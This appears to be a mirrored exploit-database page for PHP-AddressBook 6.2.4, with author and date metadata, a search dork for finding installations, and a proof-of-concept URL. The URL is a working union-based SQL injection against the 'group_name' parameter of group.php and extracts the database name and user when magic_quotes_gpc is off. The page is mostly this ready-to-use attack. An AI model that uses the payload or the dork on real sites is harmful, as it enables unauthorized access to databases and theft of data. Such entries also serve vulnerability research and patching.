[] NeoSense
E X P L O I T S
title author type platform port cve id

PHP-AddressBook 6.2.4 - 'group.php' SQL Injection

Author: hiphop
type: webapps
platform: php
port: 
date_added: 2010-12-29 
date_updated: 2010-12-29 
verified: 1 
codes: OSVDB-70219 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comaddressbookv6.2.4.zip
#Exploit Title    :  PHP-AddressBook v6.2.4 SQL INJECTION VULNERABILITIES
#Script   : PHP-AddressBook v6.2.4
#Language : PHP
#DESCRIPTION:Simple, web-based address & phone book, contact manager, organizer. Groups, addresses, e-Mails, phone numbers & birthdays. vCards, LDIF, Excel, iPhone, Gmail & Google-Maps supported
#Download : http://php-addressbook.sourceforge.net/download
#DORK: "php-addressbook"
#Date     : 2010/12/29
#Found    : by hiphop
#thanks :silly3r


proof of concept:

Condition: magic_quotes_gpc = off

http://server/group.php?group_name=1'+union+select+1,2,3,4,5,6,7,concat(database(),0x3a,user()),9'
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.